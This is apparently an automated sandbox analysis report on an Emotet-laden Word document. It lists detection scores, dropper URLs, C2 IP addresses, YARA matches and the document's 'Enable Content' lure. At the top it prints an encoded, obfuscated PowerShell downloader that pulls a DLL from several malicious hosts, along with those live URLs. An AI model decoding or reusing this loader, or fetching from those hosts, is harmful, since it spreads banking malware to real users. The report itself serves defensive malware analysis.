IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAc

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://cab.mykfn.com/admin/X/Avira URL Cloud: Label: malware
                      Source: http://gocphongthe.com/wp-content/lMMC/Avira URL Cloud: Label: malware
                      Source: http://ie-best.net/online-timer-kvhxz/ilXL/Avira URL Cloud: Label: malware
                      Source: http://www.letscompareonline.com/de.letscompareonline.com/wYd/Avira URL Cloud: Label: malware
                      Source: http://bhaktivrind.com/cgi-bin/JBbb8/Avira URL Cloud: Label: malware
                      Source: http://cab.mykfn.comAvira URL Cloud: Label: malware
                      Source: http://vanddnabhargave.com/asset/W9o/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://cab.mykfn.com/admin/X/Virustotal: Detection: 15%Perma Link
                      Source: http://gocphongthe.com/wp-content/lMMC/Virustotal: Detection: 10%Perma Link
                      Source: http://ie-best.net/online-timer-kvhxz/ilXL/Virustotal: Detection: 10%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dllMetadefender: Detection: 48%Perma Link
                      Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dllReversingLabs: Detection: 85%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: PO# 01222021.docVirustotal: Detection: 66%Perma Link
                      Source: PO# 01222021.docMetadefender: Detection: 48%Perma Link
                      Source: PO# 01222021.docReversingLabs: Detection: 67%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dllJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2097930376.000000001B390000.00000002.00000001.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: cab.mykfn.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.143.46.51:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.143.46.51:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmpString found in memory: http://cab.mykfn.com/admin/X/!http://bhaktivrind.com/cgi-bin/JBbb8/!http://vanddnabhargave.com/asset/W9o/!http://ie-best.net/online-timer-kvhxz/ilXL/!http://gocphongthe.com/wp-content/lMMC/!http://www.letscompareonline.com/de.letscompareonline.com/wYd/!http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 195.159.28.230:8080
                      Source: global trafficHTTP traffic detected: GET /admin/X/ HTTP/1.1Host: cab.mykfn.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 195.159.28.230 195.159.28.230
                      Source: Joe Sandbox ViewIP Address: 69.38.130.14 69.38.130.14
                      Source: Joe Sandbox ViewIP Address: 103.143.46.51 103.143.46.51
                      Source: Joe Sandbox ViewASN Name: ASN-CATCHCOMNO ASN-CATCHCOMNO
                      Source: Joe Sandbox ViewASN Name: TWRS-NYCUS TWRS-NYCUS
                      Source: Joe Sandbox ViewASN Name: NETMAGIC-APNetmagicDatacenterMumbaiIN NETMAGIC-APNetmagicDatacenterMumbaiIN
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.38.130.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.38.130.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6B610EC-9B88-4A7A-BAAD-75353DCC52EC}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /admin/X/ HTTP/1.1Host: cab.mykfn.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: cab.mykfn.com
                      Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmpString found in binary or memory: http://bhaktivrind.com/cgi-bin/JBbb8/
                      Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmpString found in binary or memory: http://cab.mykfn.com
                      Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmpString found in binary or memory: http://cab.mykfn.com/admin/X/
                      Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmpString found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
                      Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmpString found in binary or memory: http://gocphongthe.com/wp-content/lMMC/
                      Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmpString found in binary or memory: http://ie-best.net/online-timer-kvhxz/ilXL/
                      Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000005.00000002.2092035965.0000000002190000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117451818.00000000028F0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmpString found in binary or memory: http://vanddnabhargave.com/asset/W9o/
                      Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2092035965.0000000002190000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117451818.00000000028F0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmpString found in binary or memory: http://www.letscompareonline.com/de.letscompareonline.com/wYd/
                      Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000009.00000002.2125204739.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2340896532.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2169811211.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2182561871.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2135567121.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2339373586.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2192714957.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2149727008.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2192700429.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2182761575.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2165744116.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2128583729.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2125222649.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2151547723.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2102076691.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2135550534.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2114421803.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2160551478.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2102719700.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2117996445.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2114399878.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2149672448.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2169787783.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2137671003.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2193587143.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2170530219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2184882219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2102091974.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2339389951.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2160390338.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 6,262 N@m 13 ;a 1009
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5949
                      Source: unknownProcess created: Commandline size = 5848
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5848
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
